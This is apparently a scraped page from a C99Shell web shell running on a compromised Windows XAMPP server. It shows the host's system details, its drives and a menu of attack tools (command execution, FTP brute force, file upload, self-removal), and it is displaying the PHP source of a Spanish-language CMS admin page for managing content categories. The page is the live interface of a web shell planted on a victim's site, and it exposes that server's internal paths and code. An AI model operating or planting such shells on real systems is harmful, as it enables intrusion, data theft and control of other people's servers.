!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\portel_dama\administracion\formas\   drwxrwxrwx
Free 7.96 GB of 239.26 GB (3.33%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     contenido_categoria_administracion.php (25.52 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    $ia 
= isset($accion);
    if (
$ia == false) {
        
$accion "x";
    }
    
$ip = isset($patron);
    if (
$ip == false) {
        
$patron "%";
    }
    include(
'setup_administracion.php');
    include(
'../clases_herramientas/include_acciones.php');
    include(
'pass.php');
    include(
'../clases_herramientas/validar_tema.php');
    
$id_app 18;
?>
<style type="text/css">
<!--
.nivel1 {
    list-style-type: square;
    list-style-position: inside;
    margin: 1px 0px 0px 15px;
}
.nivel2 {
    list-style-type: square;
    list-style-position: inside;
    margin: 1px 0px 0px 25px;
}
.nivel3 {
    list-style-type: square;
    list-style-position: inside;
    margin: 1px 0px 0px 35px;
}
-->
</style>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_callJS(jsStr) { //v2.0
  return eval(jsStr)
}

function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>

<link href="<?php echo $archivo_css?>" rel="stylesheet" type="text/css">
<title><?php echo $nombre_pagina?></title>
<body bgcolor="<?php echo $color_fondo?>" link="#0099CC" vlink="#0099CC" alink="#0099CC" leftmargin="0" topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="10">
  <tr>
    <td bgcolor="<?php echo $color_fondo_banner?>"> 
      <table width="100%" border="0" cellspacing="0" cellpadding="0">
        <tr>
          <td width="25%" valign="bottom"><img src="<?php echo $imagen_banner?>" width="<?php echo $ancho_banner?>" height="<?php echo $alto_banner?>"></td>
          <td width="50%" valign="bottom" class="texto"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="texto">
              <tr> 
                <td width="25%"><?php include('light_bus.php'); ?><img src="../imagenes/user.gif" width="22" height="28">UR: 
                  <?php echo $user;?></td>
                <td width="25%" align="right"><a href="<?php echo $home_administrador?>"><img src="../imagenes/home.gif" alt="Ir al men&uacute; principal" width="32" height="29" border="0"></a><a href="#" onClick="MM_callJS('history.go(-1);')"><img src="../imagenes/back.gif" alt="Regresar" width="32" height="29" border="0"></a><a href="#"><img src="../imagenes/help_big.gif" alt="Ayuda General" width="34" height="29" border="0" onClick="MM_openBrWindow('aviso.php?tipo=2&idapp=<?php echo $id_app?>','','scrollbars=yes,width=400,height=300')"></a></td>
              </tr>
            </table></td>
          <td width="25%" align="right" valign="bottom" class="texto">&nbsp;</td>
        </tr>
      </table></td>
  </tr>
  <tr> 
    <td bgcolor="<?php echo $color_fondo_cuerpo?>"><table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
        <tr> 
          <td><strong>&Aacute;rbol de Categorias</strong> (<a href="contenido_categoria_administracion.php?patron=%25&x_y=<?php echo $x_y?>&user=<?php echo $user?>">Ver 
            Todas</a>) </td>
        </tr>
        <tr> 
          <td><table width="100%" border="0" cellpadding="6" cellspacing="0" bgcolor="#FFFFFF" class="texto">
              <tr> 
                <td> 
                  <?php
                  $link 
"contenido_categoria_administracion.php?id_app=" $id_app "&x_y=" $x_y "&user=" $user
                    
$arbol = new tree($patron,$link,'../imagenes/vinetas/nivel_1.gif','../imagenes/vinetas/nivel_2.gif''verdana'2$x_y$user);
                    
?>
                </td>
              </tr>
            </table></td>
        </tr>
        <?php 
        
if ($uid->usr_tipo == 0) {
            
$permiso 1;
        }
        if (
$permiso != 0) { ?>
        <tr> 
          <td><form action="" method="post" enctype="multipart/form-data" name="form1">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td colspan="2" align="left" bgcolor="#336699"><strong><font color="#FFFFFF">Agregar 
                    Categoria dentro de <?php echo $patron?></font></strong></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Nombre:<font color="#FF0000">*</font> 
                  </td>
                  <td align="left" bgcolor="#FFFFFF"> 
                    <input name="categoria_tema_desc" type="text" id="categoria_tema_desc"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="center" bgcolor="#FFFFFF">&nbsp; </td>
                  <td align="left" bgcolor="#FFFFFF"> 
                    <select name="share_id" id="select">
                      <option value="0">Ninguna...</option>
                      <?php $control = new tree_simple("%",$x_y,$user); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Estado:</td>
                  <td bgcolor="#FFFFFF">
<select name="categoria_estado" id="select15">
                      <?php if ($uid->usr_tipo 3) { ?>
                      <option value="0">Activo</option>
                      <option value="1">Inactivo</option>
                      <?php }else{ ?>
                      <option value="1">Inactivo</option>
                      <?php ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td width="25%" align="right" bgcolor="#FFFFFF">Formato:</td>
                  <td width="25%" bgcolor="#FFFFFF">
<select name="formato_id" id="select16">
                      <option value="0">Sin Formato</option>
                      <?php $control = new select_v1(0"formato_id, formato_nombre""presentacion_formato""formato_id != 0"20"(id)-(nombre)""<option value=\"(id)\">(nombre)</option>"""); ?>
                      <option value="share">Compartir...</option>
                    </select></td>
                  <td width="25%">&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Color de Fondo:</td>
                  <td bgcolor="#FFFFFF">
<select name="categoria_fondo_hex" id="select2">
                      <?php $control = new select_v2(1); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Imagen de Fondo:</td>
                  <td bgcolor="#FFFFFF">
<input type="file" name="categoria_fondo_imagen"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Imagen de Banner:</td>
                  <td bgcolor="#FFFFFF">
<input type="file" name="categoria_banner_imagen"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td colspan="2" align="center" bgcolor="#FFFFFF">
<input name="id_app" type="hidden" id="id_app3" value="<?php echo $id_app?>"> 
                    <?php if (isset($patron)) 
                    {
                        if (
$patron == "%") {
                            
$patron 0;
                        }
                        
$categoria_id_padre $patron;
                    }else{
                        
$categoria_id_padre 0;
                    }
?>
                    <input name="categoria_id_padre" type="hidden" id="accion2" value="<?php echo $categoria_id_padre?>"> 
                    <input name="accion" type="hidden" id="accion" value="ins_"> 
                    <input type="submit" name="Submit" value="Agregar..."> <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"> 
                    <input name="contacto_id" type="hidden" id="accion" value="<?php echo $uid->usr_ce?>"> 
                  </td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form></td>
        </tr>
        <?php ?>
        <?php 
        
if ($accion == "-1") { ?>
        <tr> 
          <td><form name="form3" method="post" action="" enctype="multipart/form-data">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td colspan="2" align="right"><a href="contenido_foto_y_medios_asignacion.php?categoria_id=<?php echo $arreglo->RESULTADOS[0][0]; ?>&t=1&x_y=<?php echo $x_y?>&user=<?php echo $user?>">A&ntilde;adir 
                    Im&aacute;genes y docs</a> <font face="Arial, Helvetica, sans-serif">I</font> 
                    <a href="contenido_categoria_alias_administracion.php?categoria_id=<?php echo $arreglo->RESULTADOS[0][0]; ?>&t=1&x_y=<?php echo $x_y?>&user=<?php echo $user?>">A&ntilde;adir 
                    un Alias</a> <font face="Arial, Helvetica, sans-serif">I</font> 
                    <a href="formas_encuesta_administracion.php?categoria_id=<?php echo $arreglo->RESULTADOS[0][0]; ?>&t=1&x_y=<?php echo $x_y?>&user=<?php echo $user?>">Encuesta</a></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td colspan="2" align="left" bgcolor="#336699"><strong><font color="#FFFFFF">Editar 
                    Categoria</font></strong></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td width="25%" align="right" bgcolor="#FFFFFF">Nombre:</td>
                  <td width="25%" bgcolor="#FFFFFF"> <input name="categoria_tema_desc" type="text" value="<?php echo $arreglo->RESULTADOS[0][2]; ?>">
                    Orden: 
                    <input name="categoria_orden" type="text" value="<?php echo $arreglo->RESULTADOS[0][8]; ?>" size="5"></td>
                  <td width="25%">&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Estado:</td>
                  <td bgcolor="#FFFFFF"> <select name="categoria_estado" id="select15">
                      <?php $control_f = new filtrar_select_edicion("""""""Activo(-)Inactivo""0(-)1""categoria_id""categoria_estado"$arreglo->RESULTADOS[0][0], "contenido_categoria""categoria_estado"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td width="25%" align="right" bgcolor="#FFFFFF">Formato:</td>
                  <td width="25%" bgcolor="#FFFFFF"> <select name="formato_id" id="select11">
                      <?php $control_f = new filtrar_select_edicion("formato_id, formato_nombre""presentacion_formato""formato_id != 0""""""categoria_id""formato_id"$arreglo->RESULTADOS[0][0], "contenido_categoria""formato_id"); ?>
                    </select></td>
                  <td width="25%">&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Color de Fondo:</td>
                  <td bgcolor="#FFFFFF"> 
                    <?php $control = new arreglo_constante(1); ?>
                    <select name="categoria_fondo_hex" id="select2">
                      <?php $control_f = new filtrar_select_edicion(""""""$control->ARREGLO_NOMBRES$control->ARREGLO_VALORES"categoria_id""categoria_fondo_hex"$arreglo->RESULTADOS[0][0], "contenido_categoria""categoria_id"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Imagen de Fondo:</td>
                  <td bgcolor="#FFFFFF"><?php echo $arreglo->RESULTADOS[0][5]; ?> 
                    <input name="categoria_fondo_imagen" type="hidden" value="<?php echo $arreglo->RESULTADOS[0][5]; ?>"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF"> <input type="checkbox" name="ver_categoria_fondo_imagen" value="1"></td>
                  <td bgcolor="#FFFFFF"> <input type="file" name="categoria_fondo_imagen_new"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF">Imagen de Banner:</td>
                  <td bgcolor="#FFFFFF"><?php echo $arreglo->RESULTADOS[0][6]; ?> 
                    <input name="categoria_banner_imagen" type="hidden" value="<?php echo $arreglo->RESULTADOS[0][6]; ?>"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right" bgcolor="#FFFFFF"> <input type="checkbox" name="ver_categoria_banner_imagen" value="1"></td>
                  <td bgcolor="#FFFFFF"> <input type="file" name="categoria_banner_imagen_new"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td colspan="2" align="center" bgcolor="#FFFFFF"> <input name="id_app" type="hidden" id="id_app" value="<?php echo $id_app?>"> 
                    <input name="categoria_id" type="hidden" id="categoria_id_padre" value="<?php echo $arreglo->RESULTADOS[0][0]; ?>"> 
                    <input name="accion" type="hidden" id="accion4" value="edi_"> 
                    <input type="submit" name="Submit3" value="Editar..."> <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"></td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form>
            
             <?php if ($uid->usr_tipo 2) { ?> 
            <form name="form2" method="post" action="contenido_categoria_mover.php">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td align="left"><img src="../imagenes/linea_admon.gif" width="397" height="11"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td> <strong><font color="#336699">1.</font></strong> Mover 
                    Categor&iacute;a a una nueva o existente dentro de.. <input name="id_app" type="hidden" id="id_app" value="18_A"> 
                    <input name="categoria_id" type="hidden" id="categoria_id_padre" value="<?php echo $arreglo->RESULTADOS[0][1]; ?>">
                    Categoria Nueva: 
                    <input name="opcion" type="checkbox" id="opcion" value="1"> 
                    <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"> 
                  </td>
                  <td width="25%">&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td align="left"> 
                    <select name="patron" id="select3">
                      <option value="0">Ninguna...</option>
                      <?php $control = new tree_simple("%"$x_y$user); ?>
                    </select> <input type="submit" name="Submit2" value="Ir..."> 
                  </td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form>
            <?php ?>
            <form name="form11" method="post" action="formas_encuesta_administracion.php">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td align="left"><img src="../imagenes/linea_admon.gif" width="397" height="11"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="left"><strong><font color="#336699">2.</font></strong> 
                    Editar Encuestas atadas a esta categoria:</td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td align="left"> 
                    <select name="encuesta_id" id="select6">
                      <?php 
                  $cuando 
"formas_encuesta.categoria_id =" $arreglo->RESULTADOS[0][0] . " order by encuesta_nombre";
                  
$control = new select_v1(0"encuesta_id, encuesta_nombre""formas_encuesta"$cuando20"(id)-(nombre)""<option value=\"(id)\">(nombre)</option>"""); ?>
                    </select> <select name="accion" id="accion_contacto">
                      <option value="-1">Editar</option>
                    </select> <input type="submit" name="Submit43" value="Ir..."> 
                    <input name="id_app" type="hidden" id="id_app8" value="60"> 
                    <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"></td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form>
            <form name="form11a" method="post" action="encuesta_resultados.php" target="_blank">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td align="left"><img src="../imagenes/linea_admon.gif" width="397" height="11"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="left"><strong><font color="#336699">3.</font></strong> 
                    Visualizar Encuestas atadas a esta categoria:</td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td align="left"> 
                    <select name="encuesta_id" id="select6">
                      <?php 
                  $cuando 
"formas_encuesta.categoria_id =" $arreglo->RESULTADOS[0][0] . " order by encuesta_nombre";
                  
$control = new select_v1(0"encuesta_id, encuesta_nombre""formas_encuesta"$cuando20"(id)-(nombre)""<option value=\"(id)\">(nombre)</option>"""); ?>
                    </select>
                    <input type="submit" name="Submit43" value="Ir..."> 
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form>
            <form name="form11" method="post" action="contenido_categoria_alias_administracion.php">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td align="left"><img src="../imagenes/linea_admon.gif" width="397" height="11"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="left"><strong><font color="#336699">4.</font></strong> 
                    Editar alias atados a esta categoria:</td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td align="left"> 
                    <select name="categoria_alias_id" id="select6">
                      <?php 
                  $cuando 
"contenido_categoria_alias.categoria_id = " $arreglo->RESULTADOS[0][0] . " order by categoria_alias_nombre";
                  
$control = new select_v1(0"categoria_alias_id, categoria_alias_nombre""contenido_categoria_alias"$cuando20"(id)-(nombre)""<option value=\"(id)\">(nombre)</option>"""); ?>
                    </select> <select name="accion" id="accion_contacto">
                      <option value="-1">Editar</option>
                    </select> <input type="submit" name="Submit43" value="Ir..."> 
                    <input name="id_app" type="hidden" id="id_app8" value="18_B"> 
                    <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"> 
                  </td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form>
            <form name="form11" method="post" action="contenido_foto_y_medios_administracion.php">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td align="left"><img src="../imagenes/linea_admon.gif" width="397" height="11"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="left"><strong><font color="#336699">5.</font></strong> 
                    Editar Im&aacute;genes y Medios atados a esta categoria:</td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td align="left"> 
                    <select name="foto_id" id="select6">
                      <?php 
                  $cuando 
"contenido_pertenencia_foto_categoria.foto_id = contenido_foto_y_medios.foto_id and contenido_pertenencia_foto_categoria.categoria_id =" $arreglo->RESULTADOS[0][0] . " order by contenido_foto_y_medios.foto_nombre";
                  
$control = new select_v1(0"contenido_foto_y_medios.foto_id, contenido_foto_y_medios.foto_nombre""contenido_foto_y_medios, contenido_pertenencia_foto_categoria"$cuando20"(id)-(nombre)""<option value=\"(id)\">(nombre)</option>"""); ?>
                    </select> <select name="accion" id="accion_contacto">
                      <option value="-1">Editar</option>
                    </select> <input type="submit" name="Submit43" value="Ir..."> 
                    <input name="id_app" type="hidden" id="id_app8" value="19"> 
                    <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"> 
                  </td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form>
            <form name="form12" method="post" action="">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td>&nbsp;</td>
                  <td align="left"><img src="../imagenes/linea_admon.gif" width="397" height="11"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="left"><strong><font color="#336699">6.</font></strong> 
                    Desasignar Imagenes y Medios:</td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td align="left"> 
                    <select name="foto_id" id="select5">
                      <?php 
                  $cuando 
"contenido_pertenencia_foto_categoria.foto_id = contenido_foto_y_medios.foto_id and contenido_pertenencia_foto_categoria.categoria_id =" $arreglo->RESULTADOS[0][0] . " order by contenido_foto_y_medios.foto_nombre";
                  
$control = new select_v1(0"contenido_foto_y_medios.foto_nombre, contenido_pertenencia_foto_categoria.categoria_id, contenido_pertenencia_foto_categoria.foto_id""contenido_foto_y_medios, contenido_pertenencia_foto_categoria"$cuando30"(nombre)-(id)-(id1)""<option value=\"(id1)\">(nombre)</option>"""); ?>
                    </select> <input name="categoria_id" type="hidden" id="links_id" value="<?php echo $arreglo->RESULTADOS[0][0]; ?>"> 
                    <input name="accion" type="hidden" id="accion6" value="del_1"> 
                    <input name="id_app" type="hidden" id="id_app7" value="<?php echo $id_app?>"> 
                    <input type="submit" name="Submit432" value="Eliminar"> <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"> 
                  </td>
                  <td width="25%">&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="left"><img src="../imagenes/linea_admon.gif" width="397" height="11"></td>
                  <td>&nbsp;</td>
                </tr>
              </table>
            </form></td>
        </tr><?php ?>
      </table></td>
  </tr>
  <tr> 
    <td align="center" bgcolor="<?php echo $color_fondo_pie?>" class="textopequeno"><?php echo $nombre_cliente?><br>
      Todos los Derechos Reservados para NRG<br>
      Bogot&aacute;, Colombia, S.A. <?php echo $ano_vig?><br>
      <a href="../../documentacion/terminos.htm">Terminos de Uso</a> <strong>I</strong> 
      <a href="../../documentacion/terms.htm">Terms of Use</a></td>
  </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--